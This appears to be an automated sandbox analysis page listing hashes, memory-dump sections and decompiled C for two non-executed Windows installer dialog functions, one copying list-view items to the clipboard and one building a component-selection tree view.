Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x571350
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404e10
0x00404e16
0x00404e1f
0x00404e22
0x00404fb3
0x00404fba
0x00404fde
0x00404fde
0x00404fe4
0x00404ff1
0x0040500f
0x0040500f
0x00405016
0x0040506d
0x0040506d
0x00405071
0x00000000
0x00000000
0x00405073
0x00405076
0x00000000
0x00000000
0x00405080
0x00405086
0x00405088
0x0040508b
0x00405184
0x00000000
0x00405184
0x0040509a
0x004050a6
0x004050ac
0x004050af
0x004050b2
0x004050c7
0x004050ca
0x004050ca
0x004050cd
0x004050b4
0x004050b9
0x004050bf
0x004050c2
0x004050c2
0x004050dd
0x004050e5
0x004050e6
0x004050e8
0x004050f1
0x004050f4
0x004050fb
0x00405102
0x0040510a
0x0040510a
0x00405118
0x0040511e
0x00405121
0x00405121
0x00405128
0x0040512e
0x00405137
0x0040513e
0x00405147
0x00405149
0x0040514c
0x0040515b
0x0040515d
0x00405163
0x00405164
0x00405165
0x00405165
0x0040516d
0x00405178
0x0040517e
0x0040517e
0x00000000
0x004050e8
0x00405018
0x0040501e
0x0040504e
0x00405050
0x00405056
0x00405061
0x00405061
0x00405068
0x00000000
0x00405068
0x00405022
0x0040502c
0x00000000
0x00404ff3
0x00404ff3
0x00404ff9
0x00405031
0x00000000
0x0040503a
0x00405002
0x00405007
0x0040500a
0x00000000
0x0040500a
0x00404ff1
0x00404e28
0x00404e2c
0x00404e35
0x00404e3c
0x00404e3f
0x00404e42
0x00404e45
0x00404e46
0x00404e47
0x00404e60
0x00404e63
0x00404e6d
0x00404e7c
0x00404e84
0x00404e8c
0x00404e91
0x00404e94
0x00404ea0
0x00404ea9
0x00404eb2
0x00404ed5
0x00404edb
0x00404eec
0x00404ef1
0x00404eff
0x00404f0d
0x00404f0d
0x00404f12
0x00404f20
0x00404f20
0x00404f25
0x00404f28
0x00404f2d
0x00404f39
0x00404f42
0x00404f4f
0x00404f5e
0x00404f51
0x00404f56
0x00404f56
0x00404f6a
0x00404f6a
0x00404f7e
0x00404f87
0x00404f90
0x00404fa0
0x00404fac
0x00404fac
0x00000000

APIs

GetDlgItem.USER32 ref: 00404E66
GetDlgItem.USER32 ref: 00404E75
GetClientRect.USER32 ref: 00404EB2
GetSystemMetrics.USER32 ref: 00404EBA
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
ShowWindow.USER32(?,00000008), ref: 00404F56
GetDlgItem.USER32 ref: 00404F77
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
GetDlgItem.USER32 ref: 00404E84

Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20

GetDlgItem.USER32 ref: 00404FC9
CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
CloseHandle.KERNEL32(00000000), ref: 00404FDE
ShowWindow.USER32(00000000), ref: 00405002
ShowWindow.USER32(00000000,00000008), ref: 00405007
ShowWindow.USER32(00000008), ref: 0040504E
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
CreatePopupMenu.USER32 ref: 00405091
AppendMenuA.USER32 ref: 004050A6
GetWindowRect.USER32 ref: 004050B9
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
OpenClipboard.USER32(00000000), ref: 00405128
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
GlobalLock.KERNEL32 ref: 00405141
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
SetClipboardData.USER32(00000001,00000000), ref: 00405178
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E

Strings

{, xrefs: 0040506D

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404618, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x5714fc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x571350
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x2
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x5714fc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x5770b8
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x571504
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x571514
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404636
0x0040463c
0x0040463e
0x00404644
0x0040464a
0x0040464d
0x00404657
0x00404660
0x00404663
0x00404666
0x0040488e
0x0040488e
0x00404895
0x004048a9
0x00404897
0x00404899
0x0040489c
0x0040489d
0x004048a4
0x004048a4
0x004048ac
0x004048b5
0x004048c0
0x004048c0
0x004048c3
0x004048c6
0x004048d5
0x004048d5
0x004048dc
0x00404954
0x00404954
0x00404957
0x00404959
0x0040495c
0x00404963
0x00404971
0x00404971
0x00404973
0x00404976
0x0040497d
0x0040497f
0x00404983
0x004049a0
0x004049a4
0x004049a4
0x00404985
0x00404992
0x00404992
0x00404983
0x0040497d
0x00000000
0x00404957
0x004048de
0x004048e1
0x004048ec
0x004048ee
0x004048f1
0x004048f8
0x004048fd
0x004048ff
0x00404909
0x00404909
0x0040490d
0x0040490f
0x00404912
0x00404914
0x00404917
0x0040492d
0x0040492d
0x00404919
0x00404919
0x0040491f
0x00404921
0x00404928
0x00404923
0x00404923
0x00404923
0x00404921
0x00404931
0x00404933
0x00404938
0x00404941
0x00404942
0x0040494c
0x0040494c
0x0040494e
0x00404951
0x00404951
0x00404912
0x00000000
0x004048ff
0x004048e3
0x004048e6
0x004048ea
0x00000000
0x00000000
0x00000000
0x004048ea
0x004048c8
0x004048cf
0x00000000
0x00000000
0x00000000
0x004048b7
0x004048b7
0x004048ba
0x004049a7
0x004049a7
0x004049ae
0x00404a22
0x00404a22
0x00404a29
0x00404a35
0x00404a35
0x00404a37
0x00404a3e
0x00404a40
0x00404a45
0x00404a47
0x00404a4a
0x00404a4a
0x00404a50
0x00404a55
0x00404a57
0x00404a5a
0x00404a5a
0x00404a60
0x00404a66
0x00404a6c
0x00404a6c
0x00404a72
0x00404a79
0x00404bc6
0x00404bc6
0x00404bcd
0x00404bcf
0x00404bd6
0x00404bda
0x00404be7
0x00404be7
0x00404bea
0x00404bf0
0x00404c02
0x00404c02
0x00404bd6
0x00000000
0x00404a7f
0x00404a81
0x00404a86
0x00404a89
0x00404a8d
0x00404a8d
0x00404a92
0x00404a95
0x00404ad6
0x00404ad8
0x00404ae2
0x00404ae8
0x00404aeb
0x00404af0
0x00404af7
0x00404afa
0x00404b9c
0x00404ba2
0x00404ba8
0x00404bad
0x00404bb0
0x00404bc1
0x00404bc1
0x00000000
0x00404b00
0x00404b00
0x00404b00
0x00404b03
0x00404b09
0x00404b0c
0x00404b0e
0x00404b10
0x00404b12
0x00404b15
0x00404b18
0x00404b1f
0x00404b21
0x00404b24
0x00404b2b
0x00404b2e
0x00404b2e
0x00404b2e
0x00404b2e
0x00404b32
0x00404b35
0x00404b41
0x00404b42
0x00404b45
0x00404b47
0x00404b47
0x00404b47
0x00404b37
0x00404b39
0x00404b39
0x00404b66
0x00404b66
0x00404b67
0x00404b73
0x00404b82
0x00404b82
0x00404b84
0x00404b87
0x00404b90
0x00404b90
0x00000000
0x00404b03
0x00404a97
0x00404aa2
0x00404aa5
0x00404aaa
0x00404aac
0x00404aae
0x00404ab0
0x00404ac0
0x00404aca
0x00404acc
0x00404acf
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ab2
0x00404ab2
0x00404ab2
0x00404ab5
0x00404ab8
0x00404aba
0x00404aba
0x00404aba
0x00404abb
0x00404abc
0x00404abc
0x00000000
0x00404ab2
0x00404a95
0x00404a79
0x004049b0
0x004049b6
0x00000000
0x00000000
0x004049c2
0x004049c6
0x00000000
0x00000000
0x004049d6
0x004049d8
0x004049db
0x00000000
0x00000000
0x004049ed
0x004049ef
0x004049f2
0x004049fc
0x004049fe
0x004049ff
0x00404a00
0x00404a0f
0x00404a11
0x00404a18
0x00404a1b
0x00000000
0x00404a1b
0x004049f4
0x004049f7
0x004049fa
0x00000000
0x00000000
0x00000000
0x004049fa
0x00000000
0x004048ba
0x0040466c
0x00404671
0x00404676
0x0040467b
0x0040467c
0x00404685
0x00404690
0x0040469b
0x004046a1
0x004046af
0x004046c4
0x004046c9
0x004046d4
0x004046dd
0x004046f2
0x00404703
0x00404710
0x00404710
0x00404715
0x0040471b
0x0040471d
0x00404720
0x00404725
0x0040472a
0x0040472c
0x0040472c
0x0040474c
0x0040474c
0x0040474e
0x0040474f
0x00404754
0x00404757
0x0040475a
0x0040475e
0x00404763
0x00404768
0x0040476c
0x00404771
0x00404776
0x00404778
0x0040477a
0x00404780
0x0040484a
0x0040485d
0x00000000
0x00404786
0x00404789
0x0040478c
0x0040478f
0x0040478f
0x00404795
0x0040479b
0x0040479e
0x004047a4
0x004047a5
0x004047aa
0x004047b3
0x004047ba
0x004047bd
0x004047c0
0x004047c3
0x004047fd
0x004047ff
0x00404828
0x00404801
0x0040480e
0x0040480e
0x004047c5
0x004047c8
0x004047d7
0x004047e1
0x004047e9
0x004047f0
0x004047f8
0x004047f8
0x004047c3
0x0040482e
0x0040482f
0x00404835
0x0040483b
0x0040483b
0x00404848
0x00404863
0x00404867
0x00404884
0x00404889
0x0040488c
0x0040488c
0x00000000
0x00404869
0x0040486e
0x00404877
0x00404c04
0x00404c16
0x00404c16
0x00404867
0x00000000
0x00404848
0x00404780

APIs

GetDlgItem.USER32 ref: 0040462F
GetDlgItem.USER32 ref: 0040463C
